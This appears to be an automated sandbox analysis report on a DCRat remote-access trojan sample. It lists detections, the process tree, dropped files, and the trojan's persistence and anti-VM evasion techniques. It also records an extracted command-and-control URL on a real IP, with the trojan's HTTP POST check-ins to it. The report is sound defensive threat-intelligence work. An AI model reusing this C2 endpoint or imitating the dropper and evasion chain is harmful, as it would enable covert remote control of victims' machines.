Windows Analysis Report
A5EbyKyjhV.exe

Overview

General Information

Sample name: A5EbyKyjhV.exe
renamed because original name is a hash value
Original sample name: 48B90C11912E9C7147D86C55D1E2CC94.exe
Analysis ID: 1569209
MD5: 48b90c11912e9c7147d86c55d1e2cc94
SHA1: ffc71fb727607913aa176c85f75972f1ac6fda7c
SHA256: bb0f507a87420a0597cdc40917ea1ba9c9576d3e750db3f9b66802b19550c9e7
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • A5EbyKyjhV.exe (PID: 6356 cmdline: "C:\Users\user\Desktop\A5EbyKyjhV.exe" MD5: 48B90C11912E9C7147D86C55D1E2CC94)
    • cmd.exe (PID: 7288 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7356 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • DZNTXHJCUWXUTqOrRrGotfqdMP.exe (PID: 7528 cmdline: "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe" MD5: 48B90C11912E9C7147D86C55D1E2CC94)
  • cleanup
{"C2 url": "http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic"}
Source | Rule | Description | Author | Strings
A5EbyKyjhV.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\RuntimeBroker.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Source | Rule | Description | Author | Strings
0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: A5EbyKyjhV.exe PID: 6356 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: DZNTXHJCUWXUTqOrRrGotfqdMP.exe PID: 7528 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.A5EbyKyjhV.exe.fc0000.0.unpack | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

                          System Summary

                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\A5EbyKyjhV.exe, ProcessId: 6356, TargetFilename: C:\Recovery\RuntimeBroker.exe
                          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                          2024-12-05T16:02:21.596399+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.7 | 49724 | 121.127.37.30 | 80 | TCP

                          AV Detection

                          Source: A5EbyKyjhV.exeAvira: detected
                          Source: http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.phpAvira URL Cloud: Label: malware
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\HbVuFfcO.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Source: C:\Users\user\Desktop\OsAKJQVe.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                          Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\PjdKZeCh.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\Desktop\SRkiCrbU.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\PvGkFmYz.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                          Source: C:\Users\user\Desktop\EZjMkwXT.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                          Source: A5EbyKyjhV.exeMalware Configuration Extractor: DCRat {"C2 url": "http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic"}
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\Desktop\DyXMTSsE.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\HLTcvXUr.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\JMBKMsmH.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\PjdKZeCh.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\PvGkFmYz.logReversingLabs: Detection: 70%
                          Source: C:\Users\user\Desktop\RunsezZZ.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\SHQSLHwr.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\SRkiCrbU.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\XMlAJXRO.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\ZPYieGWJ.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\ZeaApOeg.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\asIaZkme.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\cJayVGAz.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\ejzRghnX.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\gzRpdDAs.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\jxryOjbr.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\lPgyvanJ.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\lyZggEuH.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\mEXomrcz.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\pxmXXnNx.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\vRqeFZrR.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\zuoNrmbc.logReversingLabs: Detection: 29%
                          Source: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeReversingLabs: Detection: 73%
                          Source: A5EbyKyjhV.exeReversingLabs: Detection: 73%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\HbVuFfcO.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\OsAKJQVe.logJoe Sandbox ML: detected
                          Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\PjdKZeCh.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\SRkiCrbU.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\AlRNHzIf.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\PvGkFmYz.logJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\EZjMkwXT.logJoe Sandbox ML: detected
                          Source: A5EbyKyjhV.exeJoe Sandbox ML: detected
                          Source: A5EbyKyjhV.exeString decryptor: ["YJA3d6v8xvCs88eLwJusvaJtkkSEC2GU9KRhDEOk4xpTzp5GSd5X7x97AQS2oq64pssyq6Hs5Ky8u035pLvi7sWMKTgwvW6N1vnH6HZVWNcx9BMKWXNc4Y77WgnWZV7i","2104bcd367706e0ff53dd22047373df283e1a1506cf43ea95190e46de8cfe9d4","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                          Source: A5EbyKyjhV.exeString decryptor: [["http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/","VideorequestprocessServerprotectwindowsPublic"]]
                          Source: A5EbyKyjhV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: A5EbyKyjhV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 4x nop then jmp 00007FFAAC51C906h0_2_00007FFAAC51C6ED
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 4x nop then jmp 00007FFAAC4FC906h12_2_00007FFAAC4FC6ED

                          Networking

                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49724 -> 121.127.37.30:80
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: RANATECHNET-AFRANATechnologiesKabulAF RANATECHNET-AFRANATechnologiesKabulAF
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2560Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1436Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                          Source: unknown TCP traffic detected without corresponding DNS query: 121.127.37.30
                          Source: unknown HTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 121.127.37.30 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://121.127.37.30
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linu
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1284740476.0000000004017000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.00000000029A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                          System Summary

                          Source: A5EbyKyjhV.exe, s67.csLong String: Length: 1028508
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe\:Zone.Identifier:$DATAJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Windows\SysWOW64\InstallShield\981c2098d799b6Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC521D550_2_00007FFAAC521D55
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC5809A10_2_00007FFAAC5809A1
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E6CA90_2_00007FFAAC6E6CA9
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E04BB0_2_00007FFAAC6E04BB
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAACAAB74F0_2_00007FFAACAAB74F
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC501D5512_2_00007FFAAC501D55
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC4F1EC312_2_00007FFAAC4F1EC3
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC5609A112_2_00007FFAAC5609A1
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6D0DE912_2_00007FFAAC6D0DE9
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C9EFC12_2_00007FFAAC6C9EFC
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C6CA912_2_00007FFAAC6C6CA9
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CFCF212_2_00007FFAAC6CFCF2
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C04BA12_2_00007FFAAC6C04BA
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6C756C12_2_00007FFAAC6C756C
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CEFA112_2_00007FFAAC6CEFA1
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CF82012_2_00007FFAAC6CF820
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CEFFA12_2_00007FFAAC6CEFFA
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6D02FA12_2_00007FFAAC6D02FA
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAAC6CF3F212_2_00007FFAAC6CF3F2
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeCode function: 12_2_00007FFAACA8B74F12_2_00007FFAACA8B74F
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\AlRNHzIf.log 3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1304676851.000000001BF32000.00000002.00000001.01000000.00000000.sdmpBinary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exe, 00000000.00000000.1243276535.0000000001232000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1305830732.000000001CA43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1305830732.000000001CA43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs A5EbyKyjhV.exe
                          Source: A5EbyKyjhV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: A5EbyKyjhV.exe, E32.csCryptographic APIs: 'TransformBlock'
                          Source: A5EbyKyjhV.exe, E32.csCryptographic APIs: 'TransformFinalBlock'
                          Source: A5EbyKyjhV.exe, E32.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                          Source: A5EbyKyjhV.exe (s67.cs, 8B6.cs, 76n.cs, 7YK.cs, 52Z.cs): Base64 encoded strings
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/63@0/1
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\Desktop\DyXMTSsE.logJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7296:120:WilError_03
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeMutant created: \Sessions\1\BaseNamedObjects\Local\2104bcd367706e0ff53dd22047373df283e1a1506cf43ea95190e46de8cfe9d4
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile created: C:\Users\user\AppData\Local\Temp\6GXacmGvF1Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                          Source: A5EbyKyjhV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: A5EbyKyjhV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: A5EbyKyjhV.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile read: C:\Users\user\Desktop\A5EbyKyjhV.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\A5EbyKyjhV.exe "C:\Users\user\Desktop\A5EbyKyjhV.exe"
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
